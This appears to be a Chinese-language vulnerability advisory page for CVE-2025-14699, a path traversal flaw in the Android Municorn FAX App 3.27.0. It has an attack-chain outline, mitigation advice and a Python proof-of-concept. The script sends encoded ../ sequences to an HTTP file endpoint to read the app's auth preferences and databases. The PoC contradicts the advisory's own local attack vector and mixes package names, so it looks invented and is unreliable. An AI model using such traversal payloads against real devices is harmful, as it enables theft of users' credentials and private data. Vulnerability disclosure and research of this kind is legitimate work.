CVE-2025-14699 Municorn FAX App路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-14699

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Municorn FAX App 3.27.0 (Android)

漏洞概述

CVE-2025-14699是发现于Municorn FAX App 3.27.0版本中的一个路径遍历（Path Traversal）安全漏洞。该漏洞位于Android平台的biz.faxapp.app组件中，允许攻击者通过构造特殊的文件路径访问应用私有目录之外的敏感文件。由于攻击需要本地执行且需要低权限用户权限，攻击门槛相对较低。漏洞披露后，厂商未对此安全报告做出响应，导致漏洞可能长期存在。该漏洞已被公开披露，攻击代码可能已被公开传播，对使用该应用的Android用户构成潜在安全风险。攻击者利用此漏洞可以读取应用配置、用户数据、缓存文件等敏感信息，严重时可能导致用户隐私泄露或进一步的攻击利用。

技术细节

路径遍历漏洞，又称目录遍历攻击，是由于应用程序对用户输入的文件路径验证不充分导致的。在Municorn FAX App中，组件biz.faxapp.app在处理文件操作时，未正确验证或过滤用户提供的文件路径中的特殊字符（如../）。攻击者可以通过构造类似../../../etc/passwd或../../../data/data/com.faxapp/shared_prefs/的路径序列，利用相对路径跳转访问应用沙盒之外的系统文件或其他应用的私有数据。Android应用的Context.openFileOutput()和openFileInput()等文件操作函数通常限制在应用私有目录内，但不当使用可能导致路径遍历。攻击者需要具备本地访问权限（AV:L）和低权限（PR:L）即可实施攻击，无需用户交互（UI:N）。CVSS评分5.3表明该漏洞对机密性、完整性和可用性均造成较低影响，但仍需及时修复。

攻击链分析

STEP 1

步骤1

攻击者获取目标Android设备的本地访问权限

STEP 2

步骤2

攻击者识别Municorn FAX App已安装并获取低权限用户访问

STEP 3

步骤3

攻击者构造包含路径遍历序列（../）的恶意文件路径请求

STEP 4

步骤4

构造的路径被应用程序未经验证地传递给文件操作函数

STEP 5

步骤5

利用路径遍历跳转到应用私有目录之外的敏感文件位置

STEP 6

步骤6

读取目标文件内容，如配置文件、数据库、用户凭证等敏感数据

STEP 7

步骤7

利用获取的敏感信息进行进一步攻击或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14699 PoC - Municorn FAX App Path Traversal
# Target: Municorn FAX App 3.27.0 on Android
# Vulnerability: Path Traversal in biz.faxapp.app component

import requests
import sys
import urllib.parse

def test_path_traversal(target_url, file_path):
    """Test for path traversal vulnerability"""
    # Encode path traversal sequence
    traversal = "../../../.."
    payload = traversal + file_path
    encoded_payload = urllib.parse.quote(payload)
    
    # Construct exploit URL
    exploit_url = f"{target_url}/biz.faxapp.app/file?path={encoded_payload}"
    
    print(f"[*] Testing path traversal...")
    print(f"[*] Target URL: {exploit_url}")
    
    try:
        response = requests.get(exploit_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential vulnerability detected!")
            print(f"[+] Response length: {len(response.content)} bytes")
            print(f"[+] Content preview:\n{response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-14699.py <target_url>")
        print("Example: python3 cve-2025-14699.py http://192.168.1.100:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Test files commonly accessible via path traversal
    test_files = [
        "/data/data/com.faxapp/shared_prefs/AuthPrefs.xml",
        "/data/data/com.faxapp/files/user_data.db",
        "/etc/hosts",
        "/data/data/com.faxapp/databases/app.db"
    ]
    
    print("=" * 60)
    print("CVE-2025-14699 PoC - Municorn FAX App Path Traversal")
    print("=" * 60)
    
    for file_path in test_files:
        print(f"\n[*] Testing: {file_path}")
        test_path_traversal(target, file_path)

if __name__ == "__main__":
    main()

影响范围

Municorn FAX App 3.27.0

防御指南

临时缓解措施

由于厂商未响应安全报告，建议用户暂时停止使用Municorn FAX App，或在设备上禁用该应用。同时，Android设备用户应启用安全防护软件监控应用行为，关注厂商后续更新。如需继续使用，建议限制应用权限，避免存储敏感个人信息，并关注NVD等官方渠道的漏洞更新信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14699
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14699
3 Details https://www.cvedetails.com/cve/CVE-2025-14699/
4 VulDB https://vuldb.com/cve/CVE-2025-14699
5 Link https://github.com/Secsys-FDU/AF_CVEs/issues/3
6 Link https://vuldb.com/?ctiid.336417
7 Link https://vuldb.com/?id.336417
8 Link https://vuldb.com/?submit.706215